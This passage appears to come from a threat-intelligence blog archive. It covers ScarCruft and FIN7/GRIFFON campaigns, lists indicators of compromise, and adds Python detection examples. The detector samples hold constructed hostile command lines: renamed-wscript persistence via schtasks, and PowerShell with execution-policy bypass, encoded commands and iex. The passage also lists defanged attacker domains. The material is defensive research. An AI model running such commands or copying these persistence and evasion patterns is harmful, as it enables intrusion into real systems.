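    # rgBytes is little-endian; print it MSB-first like a normal MAC address.
    addr = ":".join(f"{b:02X}" for b in reversed(bytes(info.Address.rgBytes)))
    return {
        "Instance Name": info.szName,
        "Address": addr,
        "Class": f"0x{info.ulClassofDevice:06X}",
        "Connected": bool(info.fConnected),
        "Authenticated": bool(info.fAuthenticated),
        "Remembered": bool(info.fRemembered),
    }


def enumerate_bluetooth_devices() -> list:
    """Walk BluetoothFindFirstDevice/BluetoothFindNextDevice (Windows only)."""
    if sys.platform != "win32":
        raise OSError("bthprops.cpl is only available on Windows")
    bt = ctypes.WinDLL("bthprops.cpl")
    params = BLUETOOTH_DEVICE_SEARCH_PARAMS(
        dwSize=ctypes.sizeof(BLUETOOTH_DEVICE_SEARCH_PARAMS),
        fReturnAuthenticated=1, fReturnRemembered=1, fReturnUnknown=1,
        fReturnConnected=1, fIssueInquiry=0, cTimeoutMultiplier=0, hRadio=None)
    info = BLUETOOTH_DEVICE_INFO(dwSize=ctypes.sizeof(BLUETOOTH_DEVICE_INFO))
    bt.BluetoothFindFirstDevice.restype = ctypes.c_void_p
    h = bt.BluetoothFindFirstDevice(ctypes.byref(params), ctypes.byref(info))
    records = []
    if not h:
        return records                      # no radio, or no known devices
    try:
        while True:
            records.append(device_info_to_record(info))
            if not bt.BluetoothFindNextDevice(ctypes.c_void_p(h), ctypes.byref(info)):
                break
    finally:
        bt.BluetoothFindDeviceClose(ctypes.c_void_p(h))
    return records


def build_demo_device() -> BLUETOOTH_DEVICE_INFO:
    """Constructed sample record (not real data) used to exercise the mapping."""
    info = BLUETOOTH_DEVICE_INFO(dwSize=ctypes.sizeof(BLUETOOTH_DEVICE_INFO))
    info.Address.ullLong = 0x001122334455
    info.ulClassofDevice = 0x240404         # audio/video major class, wearable headset
    info.fConnected, info.fAuthenticated, info.fRemembered = 1, 1, 0
    info.szName = "Demo Headset"
    return info


if __name__ == "__main__":
    bt_enum_demo = [device_info_to_record(build_demo_device())]
    if sys.platform == "win32":
        bt_enum_demo += enumerate_bluetooth_devices()
    for record in bt_enum_demo:
        print(record)
```

Seen from the defender’s side, the interesting part is not the enumeration itself, which legitimate software does all the time, but the combination: a process dropped by an image-fetching downloader that loads bthprops.cpl, walks the paired-device list and then writes the result to one of the random directories the backdoor created for exfiltration.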


We have found several victims of this campaign, based on our telemetry – investment and trading companies in Vietnam and Russia. We believe they may have some links to North Korea, which may explain why ScarCruft decided to closely monitor them. ScarCruft also attacked a diplomatic agency in Hong Kong, and another diplomatic agency in North Korea. It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes.

Victimology of this campaign

Overlap with other actors

We discovered one victim from Russia that also triggered a malware detection while staying in North Korea in the past. The fact that this victim visits North Korea makes it notable and suggests that it may hold valuable information about North Korean affairs. ScarCruft infected this victim on September 21, 2018. Before that, however, another APT group had already targeted this victim: the host was infected with GreezeBackdoor on March 26, 2018.

GreezeBackdoor is a tool of the DarkHotel APT group, which we have previously written about. In addition, this victim was also attacked by the Konni malware on April 3, 2018. The Konni malware was disguised as a North Korean news item in a weaponized document (the archive was named “Why North Korea slams South Korea’s recent defense talks with U.S-Japan.zip”).

Infection timeline

This is not the first time we have seen an overlap between the ScarCruft and DarkHotel actors. Members of our team have already presented on the conflict between these two threat actors at security conferences, and we have shared more details with our threat intelligence customers in the past. Both are Korean-speaking threat actors, and their victimology sometimes overlaps. But the two groups appear to have different TTPs (Tactics, Techniques and Procedures), which leads us to believe that one group regularly lurks in the other’s shadow.


ScarCruft has shown itself to be a highly skilled and active group. It has a keen interest in North Korean affairs, attacking those in the business sector who may have any connection to North Korea, as well as diplomatic agencies around the globe. Based on ScarCruft’s recent activities, we strongly believe that this group is likely to continue to evolve. For more information please contact: intelreports@kaspersky.com

Appendix I – Indicators of Compromise

File hashes (malicious documents, Trojans, emails, decoys)

ScarCruft tools

  • 02681a7fe708f39beb7b3cf1bd557ee9 Bluetooth info harvester
  • C781f5fad9b47232b3606e4d374900cd Installer
  • 032ed0cd234f73865d55103bf4ceaa22 Downloader
  • 22aaf617a86e026424edb7c868742495 AV Remover
  • 07d2200f5c2d03845adb5b20841faa94 AV Remover
  • 1f5ac2f1744ed9c3fd01fe72ee8d334f Initial Dropper
  • 4d20f7311f4f617104f559a04afd2fbf Installer
  • 03e5e566c1153cb1d18b8bc7c493025f Downloader
  • C66ef71830341bb99d30964a8089a1fc Loader
  • 5999e01b83aa1cc12a2ad6a0c0dc27c3 Installer
  • 4d3c34a3070643c225be1dbbb3457ad4 Injector
  • 0790F1D7A1B9432AA5B8590286EB8B95 Downloader
  • 04371bf88b598b56691b0ad9da08204b Installer
  • e8b23cfc805353f55ed67cf0af58f305 UAC bypass(UACME)
  • 5380a173757e67d9b12f316771012768 Installer
  • Ec0e77b57cb9dd7a04ab6e453810937c Downloader
  • 25701492a18854ffdb05317ec7d19c29 Installer
  • 172b4dc27e41e4a0c84a803b0b944d3e UAC bypass(UACME)
  • 7149c205d634c4d17dae33fffb8a68ab Image file embedded ROKRAT
  • A76c4a79e6ff73bfd7149a49852e8916 ROKRAT
  • F63fc2d11fcebd37be3891def5776f6c Dropper
  • 899e90a0851649a5c270d1f78baf60f2 Simple HTTP Downloader
  • E88f7f285163d0c080c8d3e525b35ab3 Simple HTTP Downloader
  • D7c94c5ba028dc22a570f660b8dee5b9 Simple HTTP Downloader
  • A6bd2cf7bccf552febb8e8347d07529a Simple HTTP Downloader
  • 7a338d08226f5a38353385c8a5dec746 Simple HTTP Downloader
  • 46F66D2D990660661D00F5177306309C Simple HTTP Uploader

GreezeBackdoor of DarkHotel

  • 5e0e11bca0e94914e565c1dcc1ee6860

  • 4c2016df6b546326d67ac2a79dea1343
  • http://34.13.42[.]35/uploads/1.jpg
  • http://34.13.42[.]35/uploads/2.jpg
  • http://34.13.42[.]35/uploads/qwerty.jpg
  • http://34.13.42[.]35/uploads/girl.jpg
  • http://34.13.42[.]35/uploads/girllisten.jpg
  • https://34.13.42[.]35/uploads/newmode.php
  • http://acddesigns.com[.]au/demo/red/images/slider-pic-6.jpg
  • http://kmbr1.nitesbr1[.]org/UserFiles/File/image/index.php
  • http://kmbr1.nitesbr1[.]org/UserFiles/File/images.png
  • http://www.stjohns-burscough[.]org/uploads/images.png
  • http://lotusprintgroup[.]com/images.png
  • https://planar-progress.000webhostapp[.]com/UserFiles/File/image/image/girl.jpg
  • https://planar-progress.000webhostapp[.]com/userfiles/file/sliderpic.jpg
  • http://www.jnts1532[.]cn/phpcms/templates/default/message/bottom.jpg
  • http://www.rhooters[.]com/bbs/data/m_photo/bottom.jpg
  • https://buttyfly.000webhostapp[.]com/userfiles/file/sliderpic.jpg

Domains and IPs

  • buttyfly.000webhostapp[.]com
  • planar-progress.000webhostapp[.]com
  • 120.192.73[.]202
  • 180.182.52[.]76

8 May 2019

The 2019 DBIR Is Out

Once again, we are happy to support a large, voluntary, collaborative effort like the 2019 Data Breach Investigations Report. While our data contribution is completely anonymous, it is based on some of the 2018 data set that our private report customers receive from our efforts to protect all of our customers against every type of malware threat regardless of its source.

In general, the report is an excellent point of reference because it is sourced from so many organizations handling various incidents. This year, the Public Administration sector tops the list by far in terms of reported incidents and data along with the Information sector. “Cyber-Espionage is rampant in the Public sector, with State-affiliated actors accounting for 79 percent of all breaches involving external actors” and “Web applications are targeted with availability attacks as well as leveraged for access to cloud-based organizational email accounts.” Small businesses made up 43% of the reported DBIR breach victims in 2018.

“Use 2FA” is a common refrain throughout the report, along with “squish the phish”. Both two-factor authentication and phishing awareness, training, and handling can go a long way toward improving security in all organizations.

Enjoy another fine read this year!

8 May 2019

FIN7.5: the infamous cybercrime rig “FIN7” continues its activities

On August 1, 2018, the US Department of Justice announced that it had arrested several individuals suspected of having ties to the FIN7 cybercrime rig. FIN7 operations are linked to numerous intrusion attempts that have targeted hundreds of companies since at least as early as 2015. Interestingly, this threat actor created fake companies in order to hire remote pentesters, developers and interpreters to participate in its malicious business. The main goal behind its malicious activities was to steal financial assets from companies, such as debit cards, or to get access to financial data or to the computers of finance department employees in order to conduct wire transfers to offshore accounts.

In 2018-2019, researchers of Kaspersky Lab’s Global Research and Analysis Team analyzed various campaigns that used the same Tactics, Techniques and Procedures (TTPs) as the historic FIN7, leading the researchers to believe that this threat actor had remained active despite the 2018 arrests. In addition, during the investigation, we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations.

Recent FIN7 campaigns

The FIN7 intrusion set continued its tailored spear-phishing campaigns throughout last year. Kaspersky Lab has been able to retrieve some of these exchanges from a FIN7 target. The spear-phishing campaigns were remarkably sophisticated from a social engineering perspective. In various cases, the operators exchanged numerous messages with their victims for weeks before sending their malicious documents. The emails were efficient social-engineering attempts that appealed to a vast number of human emotions (fear, stress, anger, etc.) to elicit a response from their victims. One of the domains used by the attackers in their 2018 spear-phishing campaign contained more than 130 email aliases, leading us to think that more than 130 companies had been targeted by the end of 2018.

Malicious Documents

We have seen two types of documents sent to victims in these spear phishing campaigns. The first one exploits the INCLUDEPICTURE[1] feature of Microsoft Word to get context information about the victim’s computer, and the availability and version number of Microsoft Word. The second one, which in many cases is an Office document protected with a trivial password, such as “12345”, “1234”, etc., uses macros to execute a GRIFFON implant on the target’s computer. In various cases, the associated macro also scheduled tasks to make GRIFFON persistent.

Interestingly, following some open-source publications about them, the FIN7 operators seem to have developed a homemade builder of malicious Office documents using ideas from ThreadKit, which they employed during the summer of 2018. The new builder inserts random values in the Author and Company metadata fields. Moreover, the builder allows them to modify different IOCs, such as the filenames of the wscript.exe or sctasks.exe copies, etc.

wscript.exe copy    sctasks copy    Task name     C2
byzNne10.exe        byzNne17.exe    TaskbyzNne    logitech-cdn.com
c9FGG10.exe         c9FGG17.exe     Taskc9FGG     logitech-cdn.com
zEsb10.exe          zEsb17.exe      TaskzEsb      servicebing-cdn.com

IOCs extracted from docs which use sctasks for GRIFFON persistence

Author         Company        wscript.exe copy    C2
mogjxjtvte     mogjxjtvte     mswmex44.exe        logitech-cdn[.]com
soxvremvge     soxvremvge     c9FGG10.exe         logitech-cdn[.]com
gareljtjhvd    gareljtjhvd    zEsb10.exe          servicebing-cdn[.]com

IOCs extracted from regular documents associated with GRIFFON
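
The two tables above show the same persistence convention from the defender's side: wscript.exe and sctasks are copied under random names and a task named "Task<random>" is registered. A renamed copy keeps its PE version resource, so process-creation telemetry that records the original file name (Sysmon Event ID 1 carries an OriginalFileName field) still says "wscript.exe" even when the image on disk is byzNne10.exe. The following Python is an added example, not code from Kaspersky or from the post; the events are constructed to resemble the IOC rows (the victim path, the Office parent path, the //E:jscript switch and the schtasks arguments are assumptions made for the sample), and the detection labels are my own names.

```python
"""Flag renamed wscript.exe/schtasks.exe copies in process-creation telemetry (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcessEvent:
    """Subset of Sysmon Event ID 1 fields used by this example."""
    image: str
    original_file_name: str
    command_line: str
    parent_image: str


# System utilities whose renamed copies we want to see.
WATCHED = {"wscript.exe", "schtasks.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Task names in the post follow "Task" + random letters; weak on its own, useful combined.
TASK_NAME_RE = re.compile(r'/tn\s+"?(Task[A-Za-z0-9]+)', re.IGNORECASE)

# Constructed events modelled on the IOC tables (not real telemetry). Only the
# renamed-copy filenames and the task name come from the post.
SAMPLE_EVENTS = [
    ProcessEvent(
        image=r"C:\Users\victim\AppData\Local\Temp\byzNne10.exe",
        original_file_name="wscript.exe",
        command_line=r"byzNne10.exe //E:jscript C:\Users\victim\AppData\Local\Temp\Errors.txt",
        parent_image=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    ),
    ProcessEvent(
        image=r"C:\Users\victim\AppData\Local\Temp\byzNne17.exe",
        original_file_name="schtasks.exe",
        command_line=r'byzNne17.exe /create /sc minute /mo 10 /tn TaskbyzNne /tr "C:\Users\victim\AppData\Local\Temp\byzNne10.exe //E:jscript C:\Users\victim\AppData\Local\Temp\Errors.txt"',
        parent_image=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    ),
    ProcessEvent(  # ordinary logon script started by the shell: nothing to flag
        image=r"C:\Windows\System32\wscript.exe",
        original_file_name="wscript.exe",
        command_line=r"wscript.exe \\fileserver\netlogon\mapdrives.vbs",
        parent_image=r"C:\Windows\explorer.exe",
    ),
    ProcessEvent(  # an administrator listing tasks from a console: nothing to flag
        image=r"C:\Windows\System32\schtasks.exe",
        original_file_name="schtasks.exe",
        command_line="schtasks.exe /query /fo LIST",
        parent_image=r"C:\Windows\System32\cmd.exe",
    ),
]


def basename(path: str) -> str:
    """Lower-cased final path component, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def findings(ev: ProcessEvent) -> List[str]:
    """Return the detection labels that apply to one event (empty list if none)."""
    out: List[str] = []
    orig = ev.original_file_name.lower()
    img = basename(ev.image)
    # 1. The binary says it is wscript/schtasks but runs under another name.
    if orig in WATCHED and img != orig:
        out.append(f"renamed-{orig}")
    # 2. An Office process spawned a script host or task scheduler (renamed or not).
    if basename(ev.parent_image) in OFFICE_PARENTS and (orig in WATCHED or img in WATCHED):
        out.append("office-spawned-" + (orig if orig in WATCHED else img))
    # 3. schtasks registering a task whose name follows the observed convention.
    if orig == "schtasks.exe":
        m = TASK_NAME_RE.search(ev.command_line)
        if m:
            out.append(f"task-name-pattern:{m.group(1)}")
    return out


def scan(events) -> Dict[str, List[str]]:
    """Map image basename -> labels for every event that triggered at least one rule."""
    result: Dict[str, List[str]] = {}
    for ev in events:
        hits = findings(ev)
        if hits:
            result[basename(ev.image)] = hits
    return result


if __name__ == "__main__":
    for image, labels in scan(SAMPLE_EVENTS).items():
        print(image, labels)
```

The first rule is the robust one: a mismatch between the image name and the original file name does not depend on which random name the builder chose. The task-name rule only encodes the convention visible in the table and will fire on legitimate tasks that happen to start with "Task", so it is best treated as corroboration for the other two.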


Griffon Malware attack pattern

The GRIFFON implant is a lightweight JScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. We were able to obtain four different modules during the investigation.

Reconnaissance module

The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to deliver results, which are then sent back to the operators. Interestingly, more than 20 artifacts are retrieved from the system by this implant during the reconnaissance stage, from the date and time of operating system installation and membership in a Windows domain to a list of the workstation’s monitors and their resolutions.

Meterpreter downloader

The second module is used by the operators to execute an obfuscated PowerShell script, which contains a Meterpreter downloader widely known as “Tinymet”. This downloader, seen in past FIN7 campaigns, downloads a one-byte XOR-encrypted (e.g. with the key equal to 0x50 or 0x51) piece of Meterpreter shellcode to execute.

Screenshot module

The third module allows the operators to take a screenshot of the remote system. To do that, it also drops a PowerShell script on the workstation to execute. The script executes an open-source .NET class used for taking a screenshot. The resulting screenshot is saved at “%TMP%/image.png”, sent back to the attackers by the GRIFFON implant and then deleted.

Persistence module

The last retrieved module is a persistence module. If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim’s workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the “file-less” aspect of this method.

Through its light weight and modular architecture, the GRIFFON implant is the perfect validator. Even though we have been able to retrieve four different modules, it is possible that the FIN7 operators have more modules in their toolsets for achieving their objectives on the victim’s workstation.

On the hunt for GRIFFON infrastructure

Attackers make mistakes, and FIN7 is no exception. The major error made by its operators allowed us to follow the command and control servers of the GRIFFON implant last year. In order to trick blue teams and other DFIR analysts, the operators configured fake HTTP 302 redirections to various Google services on their C2 servers.

HTTP/1.1 302 Found
Server: nginx
Date: [retracted]
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Location: https://cloud.google.com/cdn/

Returned headers for most of the GRIFFON C2 servers on port 443

This error allowed us to follow the infrastructure week by week, until, at the end of December 2018, an individual posted on Twitter the heuristic used to track their C2s. A few days after the tweet, in January 2019, the operators changed their landing page in order to prevent this type of tracking of their infrastructure.
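
The header set quoted above is a complete fingerprint: status 302, nginx, an empty body and a Location under cloud.google.com/cdn/. The following Python is an added example, not code from Kaspersky or from the post, showing how that fingerprint can be matched against a raw HTTP response head during infrastructure hunting; both sample responses are constructed (the Date value is made up, and the second response is an ordinary redirect a real nginx site might return), and the function names are my own.

```python
"""Heuristic match for the GRIFFON C2 decoy-redirect fingerprint (added example)."""
from typing import Dict, Tuple

# Constructed sample responses (not captured traffic). The first mirrors the
# header set quoted in the post; the second is a normal site redirect.
SAMPLE_DECOY = (
    "HTTP/1.1 302 Found\r\n"
    "Server: nginx\r\n"
    "Date: Mon, 07 Jan 2019 10:00:00 GMT\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Content-Length: 0\r\n"
    "Connection: keep-alive\r\n"
    "Location: https://cloud.google.com/cdn/\r\n"
    "\r\n"
)
SAMPLE_BENIGN = (
    "HTTP/1.1 302 Found\r\n"
    "Server: nginx\r\n"
    "Date: Mon, 07 Jan 2019 10:00:00 GMT\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 154\r\n"
    "Location: https://www.example.com/login\r\n"
    "\r\n"
    "<html><body>Redirecting...</body></html>\r\n"
)


def parse_response_head(raw: str) -> Tuple[int, Dict[str, str]]:
    """Return (status_code, headers) from a raw HTTP/1.x response.

    Header names are lower-cased; a repeated header keeps its last value.
    Raises ValueError if the first line is not an HTTP status line.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        raise ValueError(f"not an HTTP status line: {lines[0]!r}")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # tolerate a malformed line instead of aborting the scan
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return int(parts[1]), headers


def matches_griffon_decoy(raw: str) -> bool:
    """True only when every element of the reported fingerprint is present."""
    status, h = parse_response_head(raw)
    if status != 302:
        return False
    if h.get("server", "").lower() != "nginx":
        return False
    if h.get("content-length") != "0":
        return False
    return h.get("location", "").startswith("https://cloud.google.com/cdn/")


if __name__ == "__main__":
    for label, sample in (("decoy", SAMPLE_DECOY), ("benign", SAMPLE_BENIGN)):
        print(label, matches_griffon_decoy(sample))
```

Requiring all four elements keeps the false-positive rate manageable, since plain "302 to a Google URL" is common on the open internet. As the post notes, the operators changed their landing page in January 2019 once the heuristic became public, so a fingerprint like this has a shelf life and is worth pairing with passive DNS and certificate data rather than used alone.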

Fake pentest company

During the investigation related to the GRIFFON infrastructure, we found a strange overlap between the WHOIS record of an old GRIFFON C2 and the website of a fake company.

According to the website, that domain supposedly belongs to a legitimate security company “fully owned by the Russian Government” (sic.) and having offices in “Moscow, Saint Petersburg and Yekaterinburg”, but the address says the company is located in Trump Tower, in New York. Given FIN7’s previous use of false security companies, we decided to look deeper into this one.

As we were looking at the content of the website, it became evident that almost all of the text used was lifted from legitimate security-company websites. Phrases and sentences were borrowed from at least the following companies/sites:

  • DKSec – www.dksec.com
  • OKIOK – www.okiok.com/services/tailored-solutions
  • MainNerve – www.mainnerve.com
  • Datics – www.datatics.com/cyber-security
  • Perspective Risk – www.perspectiverisk.com
  • Synack – https://www.synack.com/company
  • FireEye – https://www.fireeye.com/services/penetration-testing.html

This company seems to have been used by the FIN7 threat actor to hire new people as translators, developers and pentesters. During our research, we found various job advertisements associated with the company on freelance and remote-work websites.

In addition to that, various individuals have mentioned the company in their resumes. We believe that some of these individuals may not even be aware that they are working for a cybercrime business.

Links to other intrusion sets

While tracking numerous threat actors on a daily basis during the final days of 2018 and at the beginning of 2019, we discovered various activity clusters sharing certain TTPs associated with the FIN7 intrusion set. The link between these threat actors and FIN7 is still weak, but we decided to disclose a few hints regarding these in this blog post.


In its history, FIN7 has overlapped several times with Cobalt/EmpireMonkey in terms of TTPs. This activity cluster, which Kaspersky Lab has followed for a few years, uses various implants for targeting mainly banks, and developers of banking and money processing software solutions. At the end of 2018, the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims’ networks. After a successful penetration, it uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network, where it can monetize its access.

FIN7’s last campaigns were targeting banks in Europe and Central America. This threat actor is suspected of stealing €13 million from Bank of Valletta, Malta, earlier this year.

Example of malicious documents used in the end of 2018 to beginning of 2019

A few interesting overlaps in recent FIN7 campaigns:

  • Both used macros to copy wscript.exe to another file, which began with “ms” (mses.exe – FIN7, msutil.exe – EmpireMonkey).
  • Both executed a JScript file named “error” in %TEMP% (Errors.txt in the case of FIN7, Errors.bat for EmpireMonkey).
  • Both used DocuSign decoy documents with different macros. The macros popped the same “Document decryption error” error message, even though the macro code remains totally different.

We have a high level of confidence in a historic association between FIN7 and Cobalt, even though we believe that these two clusters of activity are operated by different teams.


AveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. In fact, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. Since the beginning of 2019, we have collected more than 1300 samples and extracted more than 130 C2s.

To deliver their malware, the cybercriminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882, or documents with Ole2Link and SCT. They also use AutoIT droppers, password-protected EXE files and even ISO images. Interestingly, in some emails they ask targets to phone them if they have any questions, like the FIN7 guys do.

Example of AveMaria spearphishing emails. Criminals suggest calling them.

During the investigation into FIN7, our threat-hunting systems found an interesting overlap between the infrastructure of FIN7 and AveMaria. Basically, two servers in the same IP range and the same autonomous system (AS14576) share a non-standard SSH port, 222. One of the servers is a Griffon C2, and the other one an AveMaria C2.

Distribution of targets is another factor suggesting that these two malware families may be connected. We analyzed AveMaria targets during February and March of 2019. The spearphishing emails were sent to various kinds of businesses only and did not target individuals. Thirty percent of the targets were small and medium-sized companies that were suppliers or service providers for bigger players and 21% were various types of manufacturing companies. We also spotted several typical FIN7 targets, such as retailers and hotels. Most AveMaria targets (72%) were in the EU.


At the end of 2018, while searching for new FIN7 campaigns via telemetry, we discovered a set of activity that we temporarily called “CopyPaste” from a previously unknown APT. Interestingly, this actor targeted financial entities and companies in one African country, which led us to think that CopyPaste was associated with cybermercenaries or a training center.

This set of activity relied on open-source tools, such as Powershell Empire, and well-documented red teaming techniques, in order to get a foothold within the victim’s networks and avoid detection.

Here are the main similarities between CopyPaste and FIN7:

  • Both used the same Microsoft PowerShell argument obfuscation order: “powershell.exe -NoP -NonI -ExecutionPolicy Bypass”. We have only seen FIN7 and CopyPaste use this argument list for executing their malicious Powershell scripts.
  • Both used decoy 302 HTTP redirections and typosquatting on their C2s (reminiscent of Cobalt and FIN7). The Empire C2s associated with CopyPaste had decoy redirections to Digicert and Microsoft websites, and used decoy job employment and tax websites with decoy redirections to host their payloads. FIN7 and Cobalt used decoy 302 HTTP redirections too: FIN7 on its GRIFFON C2s before January 2018, and Cobalt on its staging servers, similar to CopyPaste.
  • Quite recently, FIN7 threat actors typosquatted the brand “Digicert” using the domain name digicert-cdn[.]com, which is used as a command and control server for their GRIFFON implants. CopyPaste, in turn, also typosquatted this brand with the domains digicertweb[.]com and digi-cert[.]org, both used as Powershell Empire C2s with decoy HTTP 302 redirects to the legitimate Digicert website.
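
Two of the overlaps above are directly checkable in telemetry: the exact PowerShell switch order, and look-alike domains built around the Digicert brand. The following Python is an added example, not code from Kaspersky or from the post; the command lines are constructed (the encoded payload and the script path are placeholders), the domain list mixes the indicators given in the post with the legitimate www.digicert.com, and the brand table and function names are my own. It goes slightly beyond the text by handling quoted full paths to powershell.exe and by defanging the `[.]` notation before comparison.

```python
"""Detection helpers for two CopyPaste/FIN7 overlaps (added example)."""
import re
from typing import Iterable, List, Optional

# The argument order the post attributes to FIN7 and CopyPaste, lower-cased.
FIN7_ARG_SEQUENCE = ("-nop", "-noni", "-executionpolicy", "bypass")

# Brand named in the post, mapped to its legitimate apex domain (assumption: one entry).
BRANDS = {"digicert": "digicert.com"}

# Constructed process command lines (not from the post's telemetry).
SAMPLE_CMDLINES = [
    r'powershell.exe -NoP -NonI -ExecutionPolicy Bypass -W Hidden -enc SQBFAFgA',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -executionpolicy bypass -c "iex $x"',
    r'powershell.exe -ExecutionPolicy Bypass -NoProfile -File C:\scripts\backup.ps1',
    r'cmd.exe /c schtasks /query',
]

# Indicators from the post (defanged) plus the real site and an unrelated indicator.
SAMPLE_DOMAINS = [
    "digicert-cdn[.]com",
    "digicertweb[.]com",
    "digi-cert[.]org",
    "www.digicert.com",
    "logitech-cdn[.]com",
]


def _tokens(cmdline: str) -> List[str]:
    """Split on whitespace, keeping double-quoted runs together, then unquote and lower-case."""
    return [t.strip('"').lower() for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def has_fin7_argument_order(cmdline: str) -> bool:
    """True if PowerShell is invoked with the exact switch sequence, in that order."""
    toks = _tokens(cmdline)
    if not toks:
        return False
    exe = toks[0].replace("/", "\\").rsplit("\\", 1)[-1]
    if not exe.startswith("powershell"):
        return False
    n = len(FIN7_ARG_SEQUENCE)
    return any(tuple(toks[i:i + n]) == FIN7_ARG_SEQUENCE for i in range(1, len(toks) - n + 1))


def typosquatted_brand(domain: str) -> Optional[str]:
    """Return the brand a domain imitates, or None for the brand's own domain or an unrelated one."""
    d = domain.replace("[.]", ".").lower().rstrip(".")
    for brand, legit in BRANDS.items():
        if d == legit or d.endswith("." + legit):
            continue  # the genuine site, not a look-alike
        if brand in d.replace("-", ""):  # digi-cert -> digicert
            return brand
    return None


def suspicious_cmdlines(cmdlines: Iterable[str]) -> List[str]:
    return [c for c in cmdlines if has_fin7_argument_order(c)]


def suspicious_domains(domains: Iterable[str]) -> List[str]:
    return [d for d in domains if typosquatted_brand(d) is not None]


if __name__ == "__main__":
    print(suspicious_cmdlines(SAMPLE_CMDLINES))
    print(suspicious_domains(SAMPLE_DOMAINS))
```

The argument-order rule is deliberately strict about sequence, because the post's point is that the ordering, not the switches themselves, is the shared habit; `-ExecutionPolicy Bypass -NoProfile` in another order is routine administration and stays unflagged. The domain rule is a first-pass filter over new registrations or proxy logs and should be reviewed by a human, since a brand name inside a hostname is not proof of abuse.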

The links between CopyPaste and FIN7 are still very weak. It is possible that the CopyPaste operators were influenced by open-source publications and do not have any ties with FIN7.


During 2018, Europol and the DoJ announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. It was believed that the arrest of the group leader would have an impact on the group’s operations. However, recent data seems to indicate that the attacks have continued without significant drawbacks. One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella. We observe, with various levels of confidence, that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.

The first of them is the well-known FIN7, which specializes in attacking various companies to get access to financial data or PoS infrastructure. They rely on a Griffon JS backdoor and Cobalt/Meterpreter, and in recent attacks, Powershell Empire. The second one is CobaltGoblin/Carbanak/EmpireMonkey, which uses the same toolkit, techniques and similar infrastructure but targets only financial institutions and associated software/services providers.

We link the AveMaria botnet to these two groups with medium confidence: AveMaria’s targets are mostly suppliers for big companies, and the way AveMaria manages its infrastructure is very similar to FIN7. The last piece is the newly discovered CopyPaste group, who targeted financial entities and companies in one African country, which led us to think that CopyPaste was associated with cybermercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It is possible that the operators of this cluster of activity were influenced by open-source publications and do not have any ties with FIN7.

All of the aforementioned groups greatly benefit from unpatched systems in corporate environments. They thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework. So far, the groups have not used any zero-days.

FIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they are quite successful. As with their previous fake company “Combi Security”, we are confident that they continue to create new personas for use in either targeting or recruiting under a “new” brand, “IPC”.

More information about these and related attacks is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

Indicators of compromise

AveMaria

  • tain.warzonedns[.]com
  • noreply377.ddns[.]net
  • server.mtcc[.]me
  • doddyfire.dyndns[.]org
  • toekie.ddns[.]net
  • warmaha.warzonedns[.]com
  • digi-cert[.]org
  • somtelnetworks[.]com
  • geotrusts[.]com
  • secureclientupdate[.]com
  • digicertweb[.]com
  • sport-pesa[.]org
  • itaxkenya[.]com
  • businessdailyafrica[.]net
  • infotrak-research[.]com
  • nairobiwired[.]com
  • k-24tv[.]com
  • hpservice-cdn[.]com
  • realtek-cdn[.]com
  • logitech-cdn[.]com
  • pci-cdn[.]com
  • appleservice-cdn[.]com
  • servicebing-cdn[.]com
  • cisco-cdn[.]com
  • facebook77-cdn[.]com
  • yahooservices-cdn[.]com
  • globaltech-cdn[.]com
  • infosys-cdn[.]com
  • google-services-s5[.]com
  • instagram-cdn[.]com
  • mse-cdn[.]com
  • akamaiservice-cdn[.]com
  • booking-cdn[.]com
  • live-cdn2[.]com
  • cloudflare-cdn-r5[.]com
  • cdnj-cloudflare[.]com
  • bing-cdn[.]com
  • cdn-yahooapi[.]com
  • cdn-googleapi[.]com
  • googl-analytic[.]com
  • tw32-cdn[.]com
  • gmail-cdn3[.]com
  • digicert-cdn[.]com
  • vmware-cdn[.]com
  • exchange-cdn[.]com
  • cdn-skype[.]com
  • windowsupdatemicrosoft[.]com
  • msdn-cdn[.]com
  • testing-cdn[.]com
  • msdn-update[.]com

In order to preserve the privacy of the potential victims, we stripped the targeted entities from the domain names.

  • (entity)-corporate[.]com
